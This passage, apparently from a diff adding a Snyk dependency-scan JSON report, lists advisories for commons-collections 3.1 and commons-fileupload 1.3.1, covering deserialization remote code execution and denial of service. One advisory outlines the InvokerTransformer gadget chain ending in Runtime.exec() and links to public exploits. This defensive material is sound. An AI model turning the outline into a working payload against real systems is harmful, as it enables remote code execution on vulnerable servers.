"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": 
"NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## 
Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. 
Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. 
The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": 
"commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + }, + { + "url": "https://www.exploit-db.com/exploits/46628", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.088365Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": 
"critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99663", + "probability": "0.96725", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-4852" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.946764Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.834525Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "TERASOLUNA Framework Development Team" + ], + "semver": { + "vulnerable": [ + "[1.3,1.3.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h", + "title": "Apache-SVN" + }, + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092", + "title": "CVE Details" + }, + { + "url": "https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml%23L84", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1349475", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", 
+ "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:48.463842Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:14.033291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:46.791816Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:38.873057Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:48.463842Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:14.033291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.791816Z" + } + ], + "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
It allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.3.2 or higher.\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E)\n- [Apache-SVN](http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h)\n- [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml#L84)\n- [GitHub Commit](https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1349475)\n", + "epssDetails": { + "percentile": "0.92395", + "probability": "0.04275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3092" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-22T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2016-12-25T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.791816Z", + "socialTrendAlert": false, + 
"severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.30", + "commons-fileupload:commons-fileupload@1.3.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30401", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[1.1,1.3.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[1.1,1.3.3)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/disk/DiskFileItem.java", + "className": "DiskFileItem", + "functionName": "readObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L65", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031", + "title": "NVD" + }, + { + "url": "http://www.tenable.com/security/research/tra-2016-12", + "title": "Tenable Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:31.745804Z" + }, + { + "assigner": "SUSE", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:04.225757Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:53:55.666846Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:58.367467Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:31.745804Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:50:04.225757Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:55.666846Z" + } + ], + "description": "## Overview\n[`commons-fileupload:commons-fileupload`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22commons-fileupload%22)\nThe Apache Commons FileUpload library contains a Java Object that, upon deserialization, can be manipulated to write or copy files in arbitrary locations. If integrated with [`ysoserial`](https://github.com/frohoff/ysoserial), it is possible to upload and execute binaries in a single deserialization call.\n\n# Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n- Apache Blog\n\n## Remediation\nUpgrade `commons-fileupload` to version 1.3.3 or higher.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031)\n- [Tenable Security](http://www.tenable.com/security/research/tra-2016-12)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L65)\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c)\n", + "epssDetails": { + "percentile": "0.93419", + "probability": "0.05866", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-1000031" + ], + "CWE": [ + "CWE-284" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2017-02-22T07:28:18.753000Z", + "functions_new": [ + { + "version": [ + "[1.1,1.3.3)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.disk.DiskFileItem", + "functionName": "readObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-10-25T14:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2016-10-26T03:04:11.895000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:55.666846Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + 
"commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.37", + "commons-fileupload:commons-fileupload@1.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "title": "Information Exposure", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,1.3.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[1.2.0 ,1.3.2)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/FileUploadBase$FileItemIteratorImpl.java", + "className": "FileUploadBase$FileItemIteratorImpl", + "functionName": "" + } + }, + { + "version": [ + "[1.0-rc1,1.2.0)" + ], + "functionId": { + 